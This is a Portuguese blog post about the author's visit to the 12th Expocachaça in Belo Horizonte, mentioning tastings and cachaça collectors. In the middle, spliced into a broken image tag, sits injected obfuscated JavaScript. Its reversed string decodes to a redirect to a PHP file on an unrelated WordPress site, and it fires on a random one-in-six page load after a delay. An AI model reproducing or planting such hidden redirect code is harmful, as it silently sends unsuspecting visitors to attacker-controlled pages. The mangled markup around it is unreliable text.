
No sábado (06 de junho), cheguei em Belo Horizonte – Minas Gerais – Brasil – A TERRA DA CACHAÇA – , e logo fiquei sabendo que no dia anterior, a 12ª Expocachaça tinha recebido 16 mil pessoas. Acredito que no sábado não foi diferente. Meus amigos, o que tinha de gente naquele local… não é pra menos, na terra cachaça, o povo gosta de um caninha!!
Conheci melhor o povo mineiro, com sotaque diferente (sou paulista), com muito carisma, e que entende de cachaça. Pude experimentar muita cachaça boa, gelatina de cachaça, licor de cachaça e chocolate com cachaça.

Não posso deixar de comentar sobre os colecionadores, o Sr. Murai do Museu da Cachaça, que me recebeu super bem, e também o Sr. Toninho, que vai montar o primeiro Museu da Cachaça do Espirito Santo. Esses dois gostam de cachaça e entendem do assunto.

{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>toninho.jpg” alt=”Sr. Toninho” width=”400″ height=”300″ /><figcaption id=)
Fiz novas amizades, e conheci o pessoal que eu só tinha contato por e-mail.
Não deixem de conferir as fotos do evento. Ainda neste mês, entre um e ou tro post, eu conto mais sobre o evento. E não esqueça de assinar o nosso feed, pois neste mês temos receita de drink e culinária em nosso site.